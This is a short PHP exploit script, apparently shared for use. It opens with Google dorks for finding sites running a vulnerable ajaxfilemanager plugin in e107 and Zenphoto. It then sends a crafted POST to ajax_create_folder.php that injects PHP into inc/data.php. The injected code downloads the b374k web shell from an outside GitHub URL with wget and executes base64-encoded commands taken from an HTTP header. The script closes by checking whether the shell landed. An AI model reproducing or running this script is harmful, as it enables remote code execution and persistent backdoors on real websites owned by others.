X

1. <?php
2.  
3. /*
4. dork inurl:/e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager
5. inurl:/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/
6. use ur brain :p
7. */
8.  
9. error_reporting(0);
10. set_time_limit(0);
11. ini_set("default_socket_timeout", 5);
12.  
13. function http_send($host, $packet)
14. {
15. if (!($sock = fsockopen($host, 80)))
16. die( "\n[-] No response from {$host}:80\n");
17.  
18. fwrite($sock, $packet);
19. return stream_get_contents($sock);
20. }
21.  
22. if ($argc < 3)
23. {
24. print "\nUsage......: php $argv[0] <host> <ajaxfilemanager_path>\n";
25. print "\nExample....: php $argv[0] domain.com /e107_plugins/hupsis_media_gallery/FileManager/ajaxfilemanager/\n";
26. die();
27. }
28.  
29. $host = $argv[1];
30. $path1 = $argv[2];
31.  
32. $exploit = "foo=<?php error_reporting(0);print(system('wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O shani.php'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>";
33. $packet = "POST {$path1}/ajax_create_folder.php HTTP/1.0\r\n";
34. $packet .= "Host: {$host}\r\n";
35. $packet .= "Content-Length: ".strlen($exploit)."\r\n";
36. $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
37. $packet .= "Connection: close\r\n\r\n{$exploit}";
38.  
39. http_send($host, $packet);
40.  
41. $packet = "GET {$path1}/inc/data.php HTTP/1.0\r\n";
42. $packet .= "Host: {$host}\r\n";
43. $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
44. $packet .= "Connection: close\r\n\r\n";
45.  
46. http_send($host, $packet);
47. $in = "inc/shani.php";
48. $ha = "http://";
49. $target = $ha.$host.$path1.$in;
50. $cek = file_get_contents($target);
51.  
52. print "\n[+] Thanks to Unamed48\n";
53. if(preg_match("/File upload by unnamed48/", $cek))
54. {
55. echo "\n\n[+] uploaded XD cek @ http://$host$path1/inc/shani.php\n";
56. }
57. else {
58. echo "\n\n[-] Exploit Failed :(\n";
59. }
60. ?>